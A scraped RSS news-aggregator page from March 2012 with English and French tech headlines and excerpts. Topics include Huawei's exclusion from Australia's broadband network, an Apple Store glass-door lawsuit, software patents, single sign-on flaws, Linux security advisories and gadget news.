Channel Image08:43 Huawei hardware won't be part of National Broadband Network, says Australia» Engadget
Image
Huawei just can't catch a break -- first the US blocks it from being a part of its first responder wireless network, and now, Australia is following suit. According to the Australian Financial Review, the Shenzhen-based outfit has been barred from tendering contracts for the country's A$43 billion National Broadband Network on the advice of the Australian Security Intelligence Organization. Alexander Downer, of Huawei's Australian board directors, called the situation "ridiculous," postulating that "the whole concept of Huawei being involved in cyber-warfare is based on the company being Chinese." This isn't the first time Huawei has had to combat suspicions of espionage, last year the outfit assured the US government that a "thorough investigation will prove that Huawei is a normal commercial institution and nothing more." Cheer up, Huawei, the smartphone market still loves you.

Huawei hardware won't be part of National Broadband Network, says Australia originally appeared on Engadget on Mon, 26 Mar 2012 02:43:00 EDT. Please see our terms for use of feeds.

Permalink The Register  |  sourceAustralian Financial Review (1), (2), (3)  | Email this | Comments
Channel Image08:36 LG et Sharp auraient commencé à fournir des écrans Retina à Apple» ZDNet News
Les deux constructeurs seraient parvenus à respecter les critères de qualité fixés par Apple.
Channel Image08:10 Déçus de Free Mobile, qu'êtes-vous en droit d'attendre ?» 01net. Actualités
Quelle est votre marge de manoeuvre si vous êtes insatisfait de votre opérateur mobile ? Nous avons posé la question à Benjamin Douriez du magazine 60 Millions de consommateurs.


Channel Image08:05 Facebook dénonce les employeurs exigeant les mots de passe de leurs salariés» ZDNet News
Selon le réseau social, un nombre croissant d’entreprises réclament les mots de passe Facebook de leurs employés ou de leurs futurs employés.
Channel Image08:01 Pénalisation de la consultation de sites : le CNN interpelle Nicolas Sarkozy» ZDNet News
La pénalisation de la consultation habituelle de certains sites Web proposée par Nicolas Sarkozy devrait être soumise pour expertise au Conseil national du numérique estime cette instance, ce rapidement et avant un débat parlementaire.
Channel Image06:00 System Builder Marathon, March 2012: $650 Gaming PC» Reviews Tom's Hardware US
System Builder Marathon, March 2012: $650 Gaming PCThis quarter, we're starting our System Builder Marathon with a little experiment. Paul wanted to build a gaming PC for $650 that'd target smooth performance at 1920x1080. He had to make a couple of sacrifices in the process, but the result is compelling!
Channel Image05:57 83-Year Old Suing Apple After Walking into Glass Doors at Retail Store» MacRumors: Mac News and Rumors - Front Page
83-year old Evelyn Paswall is suing Apple after walking into the glass doors at the Apple Store Manhassett on Long Island reports CBS New York. She is asking for $75,000 in medical expenses plus punitive damages for negligence totaling $1 million.
Paswall claims that she didn’t realize that she was walking into a wall of glass as she approached the store, and says that she broke her nose as a result of the collision.

Her suit claims that “the defendant was negligent ... in allowing a clear, see-through glass wall and/or door to exist without proper warning.”
The Manhassett Apple Store has floor-to-ceiling glass walls at the front and rear of the store, with doors in the middle at both ends. It's a similar design to the Scottsdale Quarter and Lincoln Park stores.

The white "crash graphics" installed on the Apple Store transparent windows.
Image courtesy IFOAppleStore.

Last year, Apple had white stickers installed on the transparent glass of all Apple Stores to help prevent such collisions from occurring. However, the plaintiff's lawyer says that any markings that were on the glass are insufficient, saying his "client is an octogenarian. She sees well, but she did not see any glass.”


Recent Mac and iOS Blog Stories
Lines of Resellers Returning New iPads at Fifth Avenue Apple Store
Apple Loses Appeal in Italian Warranty Disclosures Case
Steve Jobs Tried to Hire Linux Creator Linus Torvalds to Work on OS X
Some Smart Covers Not Working Properly on New iPad
Angry Birds Space Launches on iOS and Mac


Channel Image05:07 ISC StormCast for Monday, March 26th 2012 http://isc.sans.edu/podcastdetail.html?id=2422, (Mon, Mar 26th)» SANS Internet Storm Center, InfoCON: green
...(more)...
Channel Image04:52 How would you change the Galaxy Tab 7.0 Plus?» Engadget
Image
We're big fans of Samsung's work and the prevailing feeling is that the Galaxy Tab 8.9 is the pinnacle of the family. The original 7-incher was too expensive and ran Android 2.2, so we were delighted to see the revamped edition running Honeycomb and costing a very reasonable $400 (it's even cheaper now). In our review, we couldn't find too much wrong with the device, in fact it's on a par with the 8.9, just a little bit smaller. But you, our friends out there, have had three or four months of constant use with this slate now, so how do you feel about it over the long-term? Does the slightly weaker screen resolution get you down? Do you wish you could make calls from it? Do you long for an S-Pen enabled edition? In a world chock-full of Samsung slates, what would you do to make this one the most desirable?

How would you change the Galaxy Tab 7.0 Plus? originally appeared on Engadget on Sun, 25 Mar 2012 22:52:00 EDT. Please see our terms for use of feeds.

Permalink   |   | Email this | Comments
Channel Image04:13 Engadget Mobile Podcast 131 - 03.25.2012» Engadget
This week, the Engadget Mobile Podcast is freer than free 4G and now features 1000% more Sascha Segan. So what are you waiting for, really?

Hosts: Myriam Joire (tnkgrl), Brad Molen, Joseph Volpe
Guest: Sascha Segan
Producer: Trent Wolbe
Music: Tycho - Coastal Brake (Ghostly International)

00:01:40 - The iPad Wins Because Android Tablet Apps Suck: An Illustrated Guide
00:10:23 - Android Lacks Focus, and It's a Problem
00:29:42 - New iPad's Screen Hogs Battery Power
00:45:10 - AT&T rolls out Android 4.0 to HTC Vivid, other devices getting ICS in the 'coming months'
00:56:53 - FreedomPop rumored to introduce iPhone case with free WiMAX service
00:58:30 - NetZero launches '4G' wireless service, we go hands-on
01:04:10 - Samsung Galaxy Tab 7.7 review (Verizon Wireless LTE)
01:15:30 - Verizon updates Revolution with Remote Diagnostics, HTC turns to LogMeIn
01:25:30 - HTC and Sprint ready to show off a new 'collaboration' April 4th, might be the One X
01:32:05 - Nokia to Apple: don't cha wish your nano-SIM was hot like ours?
01:43:00 - Apple's nano-SIM proposal draws fire from Motorola, Nokia, RIM
01:44:50 - Galaxy Note ICS upgrade pushed back to Q2, adds exclusive set of stylus-ready apps (video)
01:49:00 - FCC weighs Dish 4G network and 700MHz interoperability (updated)



Hear the podcast


Subscribe to the podcast
[iTunes] Subscribe to the Podcast directly in iTunes
[RSS MP3] Add the Engadget Mobile Podcast feed (in MP3) to your RSS aggregator and have the show delivered automatically
[RSS AAC] Add the Engadget Mobile Podcast feed (in enhanced AAC) to your RSS aggregator
[Zune] Subscribe to the Podcast directly in the Zune Marketplace

Download the podcast
LISTEN (MP3)
LISTEN (AAC)

Contact the podcast

podcast (at) engadgetmobile (dot) com.

Follow us on Twitter
@tnkgrl @phonewisdom @engadgetmobile @jrvolpe @saschasegan

Engadget Mobile Podcast 131 - 03.25.2012 originally appeared on Engadget on Sun, 25 Mar 2012 22:13:00 EDT. Please see our terms for use of feeds.

Permalink   |   | Email this | Comments
Channel Image03:33 Square's Card Case rechristened 'Pay with Square,' is first to bring geo-fenced hands-free payments to Android» Engadget
Image
You might know Square for accepting payments on your smartphone via a cute dongle, but you're probably less familiar with its second offshoot, Card Case -- a separate app that has enabled hands-free and NFC-free payments at over 70,000+ merchants for more than a year now. That effort is getting a complete overhaul today, cumulating in an entire rethink of the app and experience, in addition to its more-apt new title: Pay with Square. The redesigned UI loses its former card and leather-based garnish, opting instead for a simplified list of merchants sorted by distance and relevancy. Also making its debut is a search box, a spiffy map view and the ability to share merchants to friends through text, email or Twitter. We're most excited, though, for feature parity across iPhone and Android, which means formerly iOS-exclusive features like the auto-creation of tabs at pre-approved venues (thanks to iOS 5's geo-fencing APIs) are now present to green little robots everywhere. That's no small feat, as the company's had to roll their own geo-location API to pick up where Google's left off. We're still waiting for the Google Play listing to update, but we'll have a fresh link for you when it does.

Square's Card Case rechristened 'Pay with Square,' is first to bring geo-fenced hands-free payments to Android originally appeared on Engadget on Sun, 25 Mar 2012 21:33:00 EDT. Please see our terms for use of feeds.

Permalink   |  sourcePay with Square (iOS), Pay with Square (Android)  | Email this | Comments
Channel Image03:22 Software patents may silence little girl» David A. Wheeler's Blog

Software patents are hurting the world, but the damage they do is often hard to explain and see.

But Dana Nieder’s post “Goliath v. David, AAC style” has put a face on the invisible scourge of software patents. As she puts it, a software patent has put her “daughter’s voice on the line. Literally. My daughter, Maya, will turn four in May and she can’t speak.” After many tries, the parents found a solution: A simple iPad application called “Speak for Yourself” that implements “augmentative and alternative communication” (AAC). Dana Nieder said, “My kid is learning how to ‘talk.’ It’s breathtaking.”

But now Speak for Yourself is being sued by a big company, Semantic Compaction Systems and Prentke Romich Company (SCS/PRC), who claims that the smaller Speak for Yourself is infringing SCS/PRC’s patents. If SCS/PRC wins their case, the likely outcome is that these small apps will completely disappear, eliminating the voice of countless children. The reason is simple: Money. SCS/PRC can make $9,000 by selling their one of their devices, so they have every incentive to eliminate software applications that cost only a few hundred dollars. Maya cannot even use the $9,000 device, and even if she could, it would be an incredible hardship on a Bronx family with income from a single 6th grade math teacher. In short, if SCS/PRC wins, they will take away the voice of this little girl, who is not yet even four, as well as countless others.

I took a quick look at the complaint, Semantic Compaction Systems, Inc. and Prentke Romich Company, v. Speak for Yourself LLC; Renee Collender, an individual; and Heidi Lostracco, an individual, and it is horrifying at several levels. Point 16 says that the key “invention” is this misleadingly complicated paragraph: “A dynamic keyboard includes a plurality of keys, each with an associated symbol, which are dynamically redefinable to provide access to higher level keyboards. Based on sequenced symbols of keys sequentially activated, certain dynamic categories and subcategories can be accessed and keys corresponding thereto dynamically redefined. Dynamically redefined keys can include embellished symbols and/or newly displayed symbols. These dynamically redefined keys can then provide the user with the ability to easily access both core and fringe vocabulary words in a speech synthesis system.”

Strip away the gobbledygook, and this is a patent for using pictures as menus and sub-menus. This is breathtakingly obvious, and was obvious long before this was patented. Indeed, it would have been obvious to most non-computer people. But this is the problem with many software patents; once software patents were allowed (for many years they were not, and they are still not allowed in many countries), it’s hard to figure out where to end.

One slight hope is that there is finally some effort to curb the worst abuses of the patent system. The Supreme Court decided on March 20, 2012, in Mayo v. Prometheus, that a patent must do more than simply state some law of nature and add the words “apply it.” This was a unanimous decision by the U.S. Supreme Court, remarkable and unusual in itself. You would think this would be obvious, but believe it or not, the lower court actually thought this was fine. We’ve gone through years where just about anything can be patented. By allowing software patents and business patents, the patent and trade office has become swamped with patent applications, often for obvious or already-implemented ideas. Other countries do not allow such abuse, by simply not allowing these kinds of patents in the first place, giving them time to review the rest. See my discussion about software patents for more.

My hope is that these patents are struck down, so that this 3-year-old girl will be allowed to keep her voice. Even better, let’s strike down all the software patents; that would give voice to millions.

Channel Image03:08 FlashFXP (Fr) - v4.21 Build 1744» ToutFr.com - Les traductions mises à jour
FlashFXP est un client FTP qui présente la particularité de pouvoir transférer..
Channel Image03:00 Flawed sign-in services from Google and Facebook imperil user accounts» Ars Technica

Account login services that implement applications from Google, Facebook, and other commercial providers are prone to flaws that allow adversaries unauthorized access to private user profiles on the third-party Websites that use them, a team of computer scientists has concluded.

Their 10-month study found that many SSO, or single sign-on, services supplied by IdPs or ID Providers including Google, Facebook, and PayPal weren't properly integrated into Websites that used the services. As a result, private data on RP, or relying party, sites belonging to Farmville, Freelancer, Nasdaq, Sears, JainRain, and other sites were all vulnerable to snoops.

Read the rest of this article...

Read the comments on this post


Channel Image02:26 Inhabitat's Week in Green: supersonic biplane, urban algae farm and magnetic tattoos» Engadget
Each week our friends at Inhabitat recap the week's most interesting green developments and clean tech news for us -- it's the Week in Green.

Image

Energy-efficient transportation soared to new heights this week as MIT unveiled designs for a supersonic biplane that promises to be the successor to the Concorde. Meanwhile Boeing, Airbus and Embraer partnered to develop a new breed of affordable biofuels, and Volkswagen used space foil to make cars safer. In hot car news, Porsche announced plans to release a plug-in hybrid Panamera in 2014, and we brought you sneak peeks of several sexy electric vehicles that will be unveiled at the New York Auto Show in just over a week: Fisker's Nina plug-in hybrid and Infiniti's new Nissan leaf-based EV.

On the subject of energy efficiency, it was a big week for clean tech as Inhabitat reported that the world's most powerful wind turbine was just installed off the Belgian coast, and the National Ignition Facility flipped the switch on the world's first two-megajoule ultraviolet laser in an attempt to unlock nuclear fusion. Meanwhile, scientists discovered a link between trees and electricity by studying the way they affecty the concentration of positive and negative ions in the air, and OriginOil announced plans for an urban algae farm near Paris that will heat buildings while treating wastewater. The solar industry heard good news this week as a report showed that solar installations in the US more than doubled in 2011, and President Obama toured the states touting his "all of the above" approach to energy.

This week Inhabitat also showcased several amazing public infrastructure projects - including a series of gigantic fruit-shaped bus shelters in Japan, gmp Architekten's gorgeous new Hangzhou South Railway Station, the fresh new designs for section 3 of NYC's High Line elevated park, and a soaring 30-storey-tall wood skyscraper in Vancouver.
Image
In robot news, a Virginia Tech team created a self-charging robo-Jellyfish that harvests hydrogen fuel from water, and we shared 6 incredible inventions made possible by nanotechnology. F.A.T. Labs released a Free Universal Construction Kit that can connect LEGOs to 8 other types of building blocks, and Amazon purchased a robot company to improve working conditions in its warehouses. As most of you probably know, This American Life issued a retraction of its Apple factory exposé - and while Mike Daisey may lost his credibility, we believe strongly that distrust in the integrity of his "reporting", should not be a reason for consumers to turn a blind eye to working conditions at Foxconn and other electronics ODMs. This week Nokia filed a patent for magnetic tattoos that could vibrate when someone calls, and we learned that free smartphone applications could consume 75% more energy than paid versions. Speaking of mobile phones, new research linked cellphone radiation during pregnancy to behavioral disorders in offspring so we looked at ways pregnant mothers can protect their babies from potential cellphone radiation exposure. Last but not least, we brought you an interesting high-tech clothing concept from Stella McCartney - a sports bra with a built-in heart sensor.

Inhabitat's Week in Green: supersonic biplane, urban algae farm and magnetic tattoos originally appeared on Engadget on Sun, 25 Mar 2012 20:26:00 EDT. Please see our terms for use of feeds.

Permalink   |   | Email this | Comments
Channel Image02:22 Debian Security Advisory 2441-1» Files ≈ Packet Storm
Debian Linux Security Advisory 2441-1 - Matthew Hall discovered that GNUTLS does not properly handle truncated GenericBlockCipher structures nested inside TLS records, leading to crashes in applications using the GNUTLS library.
Channel Image02:22 Gentoo Linux Security Advisory 201203-19» Files ≈ Packet Storm
Gentoo Linux Security Advisory 201203-19 - Multiple vulnerabilities have been reported in Chromium, some of which may allow execution of arbitrary code. Versions less than 17.0.963.83 are affected.
Channel Image02:21 Debian Security Advisory 2440-1» Files ≈ Packet Storm
Debian Linux Security Advisory 2440-1 - Matthew Hall discovered that many callers of the asn1_get_length_der function did not check the result against the overall buffer length before processing it further. This could result in out-of-bounds memory accesses and application crashes. Applications using GNUTLS are exposed to this issue.
Channel Image01:50 Weekend Ar(t)s: EP presents a new challenge for Sufjan Stevens» Ars Technica

During the weekend, even Ars takes an occasional break from evaluating third-generation iPads or hypothesizing about Microsoft patents. Weekend Ar(t)s is a chance to share what we're watching/listening/reading or otherwise consuming this week.

A video!
We're not in Illinoise anymore folks.

Sufjan Stevens is the modern musician for intellectuals. He has the academic background, the intricate orchestral pop, the bevy of nerdy conceptual albums (covering topics from states to holidays, and even bridges). He once included "Decatur" and "Emancipator" within the same rhyme scheme for crying out loud.

Needless to say, news of a new Stevens EP leaked in February and caused much excitement. The project would be a collaborative effort, with Stevens forming a group called s/s/s. That meant initially pairing up with Son Lux, another heavily orchestral indie musician who once wrote an entire album in a single month, and composed for yMusic. No stretch there.

The surprise came from the inclusion of that final "s." It referred to Serengeti—a rapper who happens to share a label with Son Lux. Like many Ars staffers, he calls Chicago home and playfully weaves it into his music. Serengeti's original album referenced things from WCKG to Portillo's. Considering the emcee's affinity for concepts and hyper-referential vocals, perhaps only his musical style would truly be a stretch for Stevens.

Beak & Claw finally debuted this past week and early listens indicate it's a must for any Stevens completionist. Be warned up front: there's no outright orchestral or folk influence here. It's foreign territory for Stevens; a combo of electronica and hip-hop that should raise an eyebrow only on paper. Ultimately these four songs feature all the charming nuances of any of Stevens work, demonstrating that his musical intelligence can transcend genre.

Beak & Claw's first single, "Museum Day," is particularly indicative of this. Serengeti's verse mentions things like "dinosaur museums" and "double, triple dares," while taking a more relaxed tempo than most hip-hop (think Drake in terms of cadence). A very soothing electronic string hook is laid underneath to carry things musically. Stevens blends his own vocals (through vocoder naturally) with this to create a soundcape verging on ambient. During the chorus when he, accompanied by a familiar choir, vocally soars over a cymbal-heavy percussion beat, it's as genuinely beautiful as anything you'd find on Seven Swans.

The rest of this debut s/s/s effort reaches similar heights (possibly even higher ones, my favorite track is embedded above) and leaves a listener wanting more. It's not the first time Sufjan Stevens has been fused with hip-hop (thank Tor and his Illinoize remixes), but it's the first time he's concocted that marriage on his terms. Stevens has always been willing to challenge himself (ambitions of writing albums for all 50 states for instance), but the work of s/s/s shows he's capable of doing it through composition, not just concept. Here's hoping Beak & Claw isn't the last opportunity for that.

Read the comments on this post


Channel Image01:14 Refresh Roundup: week of March 19th, 2012» Engadget
Refresh Roundup: week of March 19th, 2012
Your smartphone and / or tablet is just begging for an update. From time to time, these mobile devices are blessed with maintenance refreshes, bug fixes, custom ROMs and anything in between, and so many of them are floating around that it's easy for a sizable chunk to get lost in the mix. To make sure they don't escape without notice, we've gathered every possible update, hack, and other miscellaneous tomfoolery we could find during the last week and crammed them into one convenient roundup. If you find something available for your device, please give us a shout at tips at engadget dawt com and let us know. Enjoy!

Continue reading Refresh Roundup: week of March 19th, 2012

Refresh Roundup: week of March 19th, 2012 originally appeared on Engadget on Sun, 25 Mar 2012 19:14:00 EDT. Please see our terms for use of feeds.

Permalink   |   | Email this | Comments
Channel Image01:00 Cracking the cloud: An Amazon Web Services primer» Ars Technica

Maybe you're a Dropbox devotee. Or perhaps you really like streaming Sherlock on Netflix. For that, you can thank the cloud.

In fact, it's safe to say that Amazon Web Services (AWS) has become synonymous with cloud computing; it's the platform on which some of the Internet's most popular sites and services are built. But just as cloud computing is used as a simplistic catchall term for a variety of online services, the same can be said for AWS—there's a lot more going on behind the scenes than you might think.

If you've ever wanted to drop terms like EC2 and S3 into casual conversation (and really, who doesn't?) we're going to demystify the most important parts of AWS and show you how Amazon's cloud really works.

Read the rest of this article...

Read the comments on this post


Channel Image00:18 Reselling Apple Products on Launch Day: "This whole game is over"» MacRumors: Mac News and Rumors - Front Page
Last week, we reported on long return lines at Apple's 5th Avenue retail store filled with Chinese iPad resellers. Resellers try to buy up as many iPads as possible on launch day to quickly turn around and sell them for a profit. According to our report many of these resellers were returning their iPads with some individuals returning up to 30 devices at one time. We speculated the reason for the returns was due to a an adequate launch supply of new iPads by Apple.


Reuters dug deeper and found that these resellers are having trouble making a profit on Apple's most recent launch, despite a healthy demand for the product in China.

Reuters reports that some of the new pressure comes from Chinese custom authorities which have told shipping companies to stop accepting iPad shipment orders. Meanwhile, the iPad has been added to a list of taxable items entering China. The end result has been much tighter margins than in the past.
An electronics dealer in Oakland, California, said he struggled to break even this year, a far cry from previous iPad releases when he shipped upwards of 1,000 tablets and pocketed profits of $50 to $100 per device sent to his buyer in Hong Kong.
The other major factor seems to be an abundance of supply and a simultaneous launch in 10 countries including Hong Kong. As a result, black market prices for the new iPad in China has been falling.

One dealer even said "This whole game is over", due to the overabundance of supply, describing the market as "flooded".


Recent Mac and iOS Blog Stories
Lines of Resellers Returning New iPads at Fifth Avenue Apple Store
Apple Loses Appeal in Italian Warranty Disclosures Case
Steve Jobs Tried to Hire Linux Creator Linus Torvalds to Work on OS X
Some Smart Covers Not Working Properly on New iPad
Angry Birds Space Launches on iOS and Mac


Sun 25 March, 2012

Channel Image23:30 Switched On: Tablets are toys. No, really.» Engadget
Each week Ross Rubin contributes Switched On, a column about consumer technology.
Image
Ever since the tablet market exploded, we've seen a wide range of designs find both success and failure. But most of the tablets on the market have something in common: they are primarily designed for adults or at least children old enough to be responsible for a fragile device. Particularly for the popular iPad, we have seen a number of specialized cases design to protect the tablet for use with young ones. But a small cadre of tablets aimed specifically at kids -- including preschoolers -- begs several questions. Are tablets good tools for kids? Is there value in optimizing them for kids? And if so, how should they be optimized?

Continue reading Switched On: Tablets are toys. No, really.

Switched On: Tablets are toys. No, really. originally appeared on Engadget on Sun, 25 Mar 2012 17:30:00 EDT. Please see our terms for use of feeds.

Permalink   |   | Email this | Comments
Channel Image23:00 Why black (or blue, or red) plants might be the key to finding life beyond Earth» Ars Technica

Take another look at that picture, and think about what you see. What are we looking at, and what’s all that green stuff?

Pretty easy quiz, right? The paint-by-numbers surface of the Earth has become second nature as satellite photos have entered the globalized world’s vernacular: water is blue, and plants are green.

But does this always have to be the case? Is it possible that plants could be red, or purple, or blue? These questions are more than just sci-fi curiosities - they’re becoming increasingly relevant as exoplanet hunters peer at distant planets, now closer than ever before.

Read the rest of this article...

Read the comments on this post


Channel Image22:13 Major ISPs agree to FCC's code of conduct on botnets, DNS attacks» Engadget
Image
The FCC's campaign to secure the internet gained new momentum last week, when a group of major ISPs signed on to a new code of conduct aimed at mitigating cybercrime. Adopted by the FCC's Communications, Security, Reliability and Interoperability Council (CSRIC), the new code targets three main security threats: botnets, DNS attacks and internet route hijacking. The Anti-Bot Code of Conduct invites ISPs to adopt sharper detection methods, and to notify and assist consumers whenever their computers are infected. The DNS code, meanwhile, offers a list of best practices by which ISPs can tighten security. Though it doesn't call for a full adoption of DNSSEC technology, the guidelines do represent a "first step" toward implementation, allowing web users to verify the authenticity of their online destinations. As for internet route attacks, the CSRIC calls for a similarly collective approach, asking ISPs to collaborate on new technologies within an industry-wide framework.

In a statement, FCC chairman Julius Genachowski said that these practices "identify smart, practical, voluntary solutions that will materially improve the cyber security of commercial networks and bolster the broader endeavors of our federal partners." The industry apparently agrees, as heavyweights like AT&T, CenturyLink, Comcast, Cox, Sprint, Time Warner Cable, T-Mobile and Verizon have already signed on. For the FCC's full statement, check out the source link below.

Major ISPs agree to FCC's code of conduct on botnets, DNS attacks originally appeared on Engadget on Sun, 25 Mar 2012 16:13:00 EDT. Please see our terms for use of feeds.

Permalink ThreatPost  |  sourceFCC (PDF)  | Email this | Comments
Channel Image22:00 HTML5 roundup: magazine-style Web layouts with CSS regions» Ars Technica

The Web is a powerful publishing platform, but HTML still has some weaknesses as a medium for presenting written content. Browser vendors and other stakeholders are working to remedy those weaknesses by improving the Web's native support for print-quality typography and text layouts.

Adobe is making significant contributions to that effort. A new set of CSS features for advanced text layouts that Adobe developed and proposed for standardization last year are beginning to gain traction. The company's CSS Regions proposal defines a system for creating magazine-style text layouts in Web content.

Read the rest of this article...

Read the comments on this post


Channel Image21:30 Sony preparing Chrome OS laptop, Google working on UI overhaul» Ars Technica

Documents submitted to the FCC reveal that Sony is preparing to launch a VAIO laptop with Google's Chrome OS operating system. The new Chromebook has an 11.6-inch display, WiFi and Bluetooth connectivity, USB ports, an HDMI output, and SD card slot.

Laptop Reviews, which drew attention to the FCC documents this weekend, believes the system may be powered by an ARM-based processor. They note the documents list the CPU as a T25. That could refer to an NVIDIA Tegra 250 T25, an SoC with a dual-core 1.2GHz Arm Cortex A9. Previous Chromebooks have all used Intel's Atom CPU.

Read the rest of this article...

Read the comments on this post


Channel Image21:00 Atlanta renovation achieves highest LEED score in Northern Hemipshere» Ars Technica

A renovated building in Midtown Atlanta has been awarded 95 out of a possible 110 LEED points for its environmental design-the highest score for any new construction in the Northern Hemisphere.

Though classified as a "New Construction" in the Leadership in Energy and Environmental Design system, 1315 Peachtree Street, Atlanta is actually a 1980s construction that has undergone extensive renovation. But what does LEED certification entail? And is this the greenest building in the Northern Hemisphere?

Read the rest of this article...

Read the comments on this post


Channel Image20:56 AT&T Labs, Carnegie Mellon research haptic-feedback steering wheel for turn-by-turn directions» Engadget
A force-feedback steering wheel. It's quite literally the stuff of racing games, and AT&T labs, along with Carnegie Mellon, is researching the possibly of throwing similar tech into your real-world whip. MIT's Technology Review recently highlighted the project, which uses 20 vibrating actuators shoved inside of a steering wheel to create a variety of patterns -- a counter-clockwise sequence could indicate a left turn, for example. As you might have guessed, one of the goals is to keep drivers less distracted by the likes of visual turn-by-turn GPS navigators and more focused on the road. While it's currently being tested with driving simulators, the results are positive so far, if a bit modest. When supplemented with typical audio / visual navigation, folks near the age of 25 kept their eyes planted on the asphalt for 3.1 percent more time than without it. Notably, the improvement wasn't found with those over 65 in the aforementioned instance, however, supplemented with just the audio, the vibrating wheel had them focusing on the road by an increase of four percent.

According to Technology Review, this isn't the first time haptic feedback has been tested as a driving aid, although past tests have, notably, resulted in "fewer turn errors" by those behind the wheel. Best of all, the tech is capable of sending more than just navigation cues -- it could certainly be useful in a Telsa. So when can you expect to find a force-feedback steering wheel in your ride? Technology Review cites Kevin Li, an AT&T Labs researcher on the project, who says the main hurdle is making something that people will just "get," and that it's still "years" away from becoming a possibility. While there's no photos of the setup just yet, a full report on the research will get released in June. Hey, there's always Forza and Gran Turismo, at least for now -- right?

AT&T Labs, Carnegie Mellon research haptic-feedback steering wheel for turn-by-turn directions originally appeared on Engadget on Sun, 25 Mar 2012 14:56:00 EDT. Please see our terms for use of feeds.

Permalink Electronista, The Verge  |  sourceMIT Technology Review  | Email this | Comments
Channel Image20:32 Avalanches aid ice-cream research» BBC News - Technology
Avalanche experts are helping to study how ice-cream's structure changes when it is stored in a household freezer.
Channel Image20:25 With Oracle vs. Google trial about to begin, judge orders settlement talks» Ars Technica

High-level executives at Google and Oracle were ordered to hold one last round of settlement talks, with the trial over Google's alleged use of Java technology in Android set to begin April 16.

The suit began in August 2010 when Oracle sued Google for patent and copyright infringement over use of the Java programming language in development of Android. Settlement talks have been ordered multiple times, but so far no deal has been made. On Friday, Judge Paul Grewal of US District Court in Northern California ordered Android chief Andy Rubin and Oracle Chief Financial Officer Safra Catz to hold "a further settlement conference" no later than April 9.

Read the rest of this article...

Read the comments on this post


Channel Image20:15 Montana kids win contest, choose first GRAIL photos of the moon» Ars Technica

Fourth grade students from Emily Dickinson Elementary School in Bozeman, Montana won the contest to rename two NASA spacecrafts. Their prize? The right to choose which parts of the moon the NASA ships would photograph. The images they chose have now been made available by the space agency.

In a perfect storm of bureaucratic literalism and mythopoetic overstatement, the two crafts were formerly called "Gravity Recovery And Interior Laboratory (GRAIL) A and B." The students won the right to direct the craft's MoonKAM (Moon Knowledge Acquired by Middle school students, seriously?) to photograph their choice by slightly purging NASA of its endemic etymological turgidity. The kids' entry for the crafts' new names: Ebb and Flow.

GRAIL was NASA's first planetary mission devoted to education and is directed by the first American woman in space, Sally Ride. The MoonKAM will be used by 2,700 schools in 52 countries over the course of the mission. NASA hopes direct control over a spacecraft (or a sizable chunk of it anyway—the camera) will, in the minds of a generation of school children, turn the moon from an abstraction into something they feel invested in.

"What might seem like just a cool activity for these kids may very well have a profound impact on their futures," Ride said in NASA's announcement. "The students really are excited about MoonKAM, and that translates into an excitement about science and engineering."

Read the rest of this article...

Read the comments on this post


Channel Image19:08 Instagram for Android sign-up page goes live» GadgeTell
It has been a long time since Instagram was first announced for Android. We don’t know exactly when it’ll be released, but the folks at Instagram showed off an unfinished version of Instagram for Android at SXSW that got everyone talking again. This weekend, Instagram received more attention by letting users sign up to be more »
Channel Image19:04 evilcode.class, (Sun, Mar 25th)» SANS Internet Storm Center, InfoCON: green
Exploit authors sometimes like to be cute: A Java archive called fun.jar containin ...(more)...
Channel Image19:00 Weird Science smells its way out of awkward social situations» Ars Technica

You smell uncomfortable and accident prone: What do we rely on our sense of smell for? A new study attempts to find out by surveying a population of 32 individuals who were born without the ability to detect odors (in jargonese, that's "isolated congenital anosmia"). The answers: those without a functional nose tended to be involved in more household accidents, while experiencing "enhanced social insecurity." For the former, many have adopted coping strategies like asking others to determine whether a container of milk has gone bad.

I'm not sure prison is the right place to be testing gender theories: This is a case where an interesting and potentially useful finding is probably being a bit overinterpreted. Some researchers tracked the incidence of sexual violence in state prisons and found that it was lower in states that allowed their inmates conjugal visits. However, they've attempted to broaden that into some sort of grand conclusion about whether rape is a matter of gender-driven power struggles, which is probably stretching the relevance of the results past their breaking point.

Verdi after organ transplants, Enya for day-to-day life: This one had Weirdness written all over it, starting with the title: "Auditory stimulation of opera music induced prolongation of murine cardiac allograft survival and maintained generation of regulatory CD4+CD25+ cells." Yes, some researchers have honestly subjected mice to a heart transplant, and then subjected them to either plain noise, opera, classical music, or Enya. The ones that got Verdi or Mozart handled their transplant better.

There are two things worth pointing out about this study. The first is that various forms of stress are known to alter immune function, and these mice appear to have gotten the music 24 hours a day for a week. So it's not out of the question that there would be some difference in immune response. The second thing is that, should you have a pretentious friend point to this as evidence of the superiority of opera, point out that a reduced immune response isn't considered a great thing if you haven't just had an organ transplant.

This sounds a bit more involved than the average runner's high: Apparently, it might be time to reinterpret some of the grunting you hear at the gym, as there is a population of women out there who sometimes experience what's being termed an "exercise induced orgasm." Generally, this came during a heavy abdominal workout (a pattern that's apparently earned them the term "coregasm"), although some have also had it while bicycling or hiking. The authors note that the women who get them say they don't generally involve any mental sexual imagery, raising questions about whether there's any necessary connection between the orgasm and sexual activity.

Read the comments on this post


Channel Image18:08 What do Samsung and Phones 4u have to show the UK on March 30th?» Engadget
Image
We're not saying this could be the date-of-reveal for the Galaxy S III, but we also can't say it's not. What we can surmise, however, is that either Samsung or UK retailer Phones 4u (possibly both) apparently have something to unveil on March 30th. According to Eurodroid, the window pictured above, simply reading "coming 30.03.12" under a Samsung logo, was photographed by one of its readers outside of the Phones4u located on Oxford St. in London. The site also notes that this same location was the exclusive retailer for the Galaxy Nexus when it launched, making the little meat that's currently here all the more juicy. Whatever Sammy has in store, you'll just have to keep guessing as it remains a mystery for now. Hit up the links below for more photos and speculation, and be sure let us know your best guess in the comments.

What do Samsung and Phones 4u have to show the UK on March 30th? originally appeared on Engadget on Sun, 25 Mar 2012 12:08:00 EDT. Please see our terms for use of feeds.

Permalink Gizmodo UK  |  sourceEurodroid  | Email this | Comments
Channel Image16:54 Harry Potter Wizards Collection brings home all eight movies on a ridiculous 31 discs (video)» Engadget
Image
Now that all of the Harry Potter movies have been released, Warner Bros. has seen fit to slide them together in one truly epic set. Harry Potter Wizard's Collection spans 31 discs including the theatrical version of each movie, extended cuts of the first two flicks, 3D versions of the last two, Ultraviolet digital copies and several bonus discs with ten hours of new to disc bonus content and 5 hours of never before seen extras. Of course, we should also mention the incredibly detailed box it all comes in, seen in the CG video above. Of course, you can't always have everything, and some fans are upset about what this collection doesn't include -- extended versions of the last six movies. Those still interested can preorder the $499 MSRP set (currently selling for $349 on Amazon) for delivery September 7th, and get an early preview of one of the special features embedded after the break.

